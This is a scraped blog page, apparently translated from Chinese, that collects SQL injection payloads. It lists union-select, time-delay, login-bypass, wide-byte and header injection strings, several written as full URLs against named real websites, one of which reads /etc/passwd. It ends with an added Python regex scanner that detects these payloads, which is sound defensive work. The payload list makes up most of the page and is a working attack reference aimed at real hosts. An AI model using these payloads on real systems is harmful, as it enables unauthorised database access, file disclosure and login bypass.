A collection of common test statements

Source: Internet  Published: linux firewall modification  Editor: 程序博客网  Time: 2024/05/22 00:18

SQL injection:

    http://www.wooyun.org/bugs/wooyun-2010-0114928

http://weixin.family.baidu.com/index.php/site/user_t?id=1%27%20union%20select%201,2,version%28%29,4%20--%20;
http://www.wooyun.org/bugs/wooyun-2010-0105423
"https://jpaas-edu.baidu.com/xplatfe/invite/api_use_invite_code?invite_code=123' or 1=(1=".$_GET['sql'].") limit 1--+&verify=7kpc"
http://180.149.139.84/api/api.php?action=info&virtualserver=fe-dpool_wb_head_pic%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,load_file%28%27/etc/passwd%27%29,13%20--%20;
lijiejie's string-type injection statements:
 id=17' and sleep(5)#;  // note that and short-circuits; or sometimes seems to work better
id=(sleep(length(user())=18)),id=1235-1(12345-length(user()))
 abc' and/or (select  *  from  (select(sleep(10)))b) and '1'='1  // sqlmap's classic time-delay statement
http://kact.kingdee.com/world/createArticle?corp_id=aaa'XOR(if(length(user())=20,sleep(3),0))OR'bbb (an impressive statement that uses no spaces)
Passwords for login-form injection:
admin' or 1=1#  (any password)
admin' or '1'='1' -- ;
Pseudo-static URLs: (time-delay injection is generally what is seen to work here)
http://www.wooyun.org/bugs/wooyun-2010-0119845   or   if(length(database(),1,1)<5,sleep(1),1)
http://www.wooyun.org/bugs/wooyun-2010-0119490  time-delay injection: waitfor delay '0:0:5'--  related statement:  xnjodhe'; waitfor delay '0:0:5' --
Injection commonly seen in search features:
 http://www.wooyun.org/bugs/wooyun-2010-0118356   abc' or "='  ; %' and  1=1  and '%'='%
There is also HTTP header injection: client-ip, user-agent and the like.
POST, AJAX and API endpoints generally tend to hide more of these issues.
String-type test cases:
1' and 1=1--   http://t2.easou.com/zone/mobile/mobilekey/key/0/breed_id/1' and 1=1-- /mid/1100/ou/rurl  http://www.wooyun.org/bugs/wooyun-2010-092366 (pseudo-static case)
1' and '1'='1,1 and '1'='2
  http://ldj.db.17173.com/showInfo.php?a=1&id=(sleep(length(user())=18))
Wide-byte injection cases:
http://www.wooyun.org/bugs/wooyun-2010-0134651  %df'
http://www.wooyun.org/bugs/wooyun-2010-0133613 (clever guy) 運
Numeric-type test cases:
1 and sleep(5)
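
A defender-side counterpart to the strings collected above, as an added example that is not from the original page: a small Python scanner that flags these payload families in request fields (URL, body, headers such as client-ip). The rule names, the `scan_request` helper and the sample requests are constructed for illustration, and the patterns are heuristics rather than a complete filter.

```python
import re
from urllib.parse import unquote_plus

# Heuristic signatures for the payload families listed on this page.
# Rule names are made up for this example; the list is not exhaustive.
RULES = [
    ("time_based", re.compile(r"\bsleep\s*\(|\bwaitfor\s+delay\b", re.I)),
    ("union_select", re.compile(r"\bunion\b.{0,40}?\bselect\b", re.I | re.S)),
    ("file_read", re.compile(r"\bload_file\s*\(", re.I)),
    ("tautology", re.compile(
        r"'\s*(?:or|and|xor)\s*\(?\s*'?\d+'?\s*=\s*'?\d+", re.I)),
    # Wide-byte: a high lead byte directly before a quote, e.g. %df' or %df%27.
    # Matched on the raw value because decoding destroys the lone byte.
    ("wide_byte", re.compile(r"%[89a-f][0-9a-f](?:%27|')", re.I)),
]

def scan_request(fields):
    """Return {field: [rule names]} for each request field that matches."""
    findings = {}
    for field, raw in fields.items():
        decoded = unquote_plus(raw)
        hits = [name for name, rx in RULES
                if rx.search(raw if name == "wide_byte" else decoded)]
        if hits:
            findings[field] = hits
    return findings

# Constructed sample requests (not taken from real logs).
SAMPLES = [
    {"url": "/item.php?id=17%27%20and%20sleep(5)%23"},
    {"url": "/user?id=1%27%20union%20select%201,2,version%28%29,4%20--%20"},
    {"url": "/login", "body": "user=admin' or '1'='1' -- &pass=x"},
    {"url": "/news?id=1%df%27%20and%201=1--%20"},
    {"url": "/", "client-ip": "10.0.0.5'; waitfor delay '0:0:5' --"},
    {"url": "/search?q=o%27reilly+sleep+study"},  # benign: no rule should fire
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(sample.get("url"), "->", scan_request(sample) or "clean")
```

Matching like this is useful for triaging logs; the fix for the underlying flaw is parameterized queries on the server side.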
